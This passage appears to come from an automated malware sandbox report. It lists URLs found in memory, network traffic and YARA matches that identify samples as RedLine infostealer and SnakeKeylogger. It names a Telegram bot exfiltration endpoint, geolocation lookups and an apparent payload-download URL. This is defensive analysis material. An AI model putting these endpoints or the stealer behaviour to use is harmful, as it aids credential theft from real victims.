            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D515000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D509000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADBA000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C830000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D515000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADBA000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C830000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D4A0000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/h
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/p
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: x.exe, 00000001.00000002.1879596549.0000000021B30000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000003.1853089482.000000007F43A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1878974952.000000002173A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1825875616.000000007F62F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.00000000204BF000.00000004.00001000.00020000.00000000.sdmp, liuuazhU.pif.1.dr | String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
            Source: x.exe, 00000001.00000002.1879596549.0000000021B30000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000003.1853089482.000000007F43A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1878974952.000000002173A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1825875616.000000007F62F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.00000000204BF000.00000004.00001000.00020000.00000000.sdmp, liuuazhU.pif.1.dr | String found in binary or memory: http://ocsp.comodoca.com0$
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0C
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D531000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADD6000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C830000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D4A0000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: x.exe, 00000001.00000002.1879596549.0000000021B30000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000003.1853089482.000000007F43A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1878974952.000000002173A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1825875616.000000007F62F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.00000000204BF000.00000004.00001000.00020000.00000000.sdmp, liuuazhU.pif.1.dr | String found in binary or memory: http://www.pmail.com0
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D458000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D515000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADBA000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C830000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D515000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADBA000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C830000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D458000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD66000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADBA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D515000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C830000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
            Source: liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD66000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.orgfl
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://sectigo.com/CPS0
            Source: x.exe, 00000001.00000002.1875750599.00000000205CC000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.volareconsultoria.com.br/245_Uhzauuilkul
            Source: x.exe, 00000001.00000002.1855286953.0000000000726000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.volareconsultoria.com.br/u
            Source: x.exe, 00000001.00000002.1855286953.0000000000751000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.volareconsultoria.com.br:443/245_Uhzauuilkuluo
            Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknown | HTTPS traffic detected: 50.116.86.44:443 -> 192.168.2.4:49731 version: TLS 1.2

            System Summary

            Source: 17.2.liuuazhU.pif.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 17.1.liuuazhU.pif.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 6.3.liuuazhU.pif.1b37a088.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 11.1.liuuazhU.pif.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 11.2.liuuazhU.pif.476068.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 17.1.liuuazhU.pif.43d038.1.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 11.2.liuuazhU.pif.2aa80f08.6.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 17.2.liuuazhU.pif.1c560f08.6.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 6.2.liuuazhU.pif.1d3a0f08.5.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 17.2.liuuazhU.pif.1c17772e.4.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 17.2.liuuazhU.pif.1d7f5570.8.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 11.2.liuuazhU.pif.2bd36478.9.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 11.2.liuuazhU.pif.2bd36478.9.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 1.2.x.exe.21751178.9.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 11.2.liuuazhU.pif.43d038.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 6.2.liuuazhU.pif.1f8a0000.9.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 11.2.liuuazhU.pif.2aa80f08.6.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 6.2.liuuazhU.pif.1f8a0000.9.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 6.2.liuuazhU.pif.1e426478.7.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 17.1.liuuazhU.pif.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 17.2.liuuazhU.pif.1d824590.10.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 6.2.liuuazhU.pif.1d03772e.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 11.2.liuuazhU.pif.2a99772e.4.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 11.2.liuuazhU.pif.2a996826.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 17.2.liuuazhU.pif.1d7f6478.9.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 11.2.liuuazhU.pif.2bd35570.8.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 11.2.liuuazhU.pif.2bd35570.8.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 11.2.liuuazhU.pif.2a996826.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 6.2.liuuazhU.pif.1d03772e.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 17.2.liuuazhU.pif.1d7f5570.8.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 17.2.liuuazhU.pif.1c760000.7.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 11.2.liuuazhU.pif.43d038.1.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 17.2.liuuazhU.pif.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 17.2.liuuazhU.pif.1d7f6478.9.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 11.2.liuuazhU.pif.2ab30000.7.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 17.2.liuuazhU.pif.1c560000.5.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 6.2.liuuazhU.pif.1d036826.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 17.2.liuuazhU.pif.1c760000.7.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 6.2.liuuazhU.pif.1d3a0000.4.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 11.1.liuuazhU.pif.43d038.2.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 11.2.liuuazhU.pif.2bd64590.10.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 17.2.liuuazhU.pif.1c17772e.4.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 17.2.liuuazhU.pif.476068.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 6.2.liuuazhU.pif.1e425570.6.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 17.2.liuuazhU.pif.43d038.1.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 17.2.liuuazhU.pif.1c560000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 6.2.liuuazhU.pif.1e425570.6.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 11.1.liuuazhU.pif.476068.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 11.2.liuuazhU.pif.2bd64590.10.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 17.2.liuuazhU.pif.1c176826.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 11.2.liuuazhU.pif.2aa80000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 11.2.liuuazhU.pif.400000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 17.2.liuuazhU.pif.1c560f08.6.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 6.2.liuuazhU.pif.400000.1.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 17.2.liuuazhU.pif.1c176826.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 6.2.liuuazhU.pif.1e426478.7.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 11.3.liuuazhU.pif.28cff190.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 6.2.liuuazhU.pif.1d3a0000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 6.2.liuuazhU.pif.1e454590.8.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 17.1.liuuazhU.pif.476068.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 6.1.liuuazhU.pif.400000.1.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 17.2.liuuazhU.pif.1d824590.10.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 6.2.liuuazhU.pif.1d3a0f08.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 17.3.liuuazhU.pif.1a55c2f8.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 6.2.liuuazhU.pif.1e454590.8.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 11.2.liuuazhU.pif.2aa80000.5.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 11.2.liuuazhU.pif.400000.2.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 6.2.liuuazhU.pif.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 6.2.liuuazhU.pif.1d036826.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 17.1.liuuazhU.pif.43d038.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 11.2.liuuazhU.pif.2a99772e.4.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 11.1.liuuazhU.pif.400000.1.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 10.2.Uhzauuil.PIF.20f96fd8.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 6.3.liuuazhU.pif.1b37a088.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 11.2.liuuazhU.pif.2ab30000.7.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 10.2.Uhzauuil.PIF.20f5dfa8.4.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 11.3.liuuazhU.pif.28cff190.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 6.1.liuuazhU.pif.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 17.3.liuuazhU.pif.1a55c2f8.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 10.2.Uhzauuil.PIF.20f5dfa8.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 11.1.liuuazhU.pif.43d038.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 6.2.liuuazhU.pif.43d038.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 6.1.liuuazhU.pif.43d038.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 1.2.x.exe.215607b8.8.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 17.2.liuuazhU.pif.43d038.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 00000011.00000001.2046847022.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
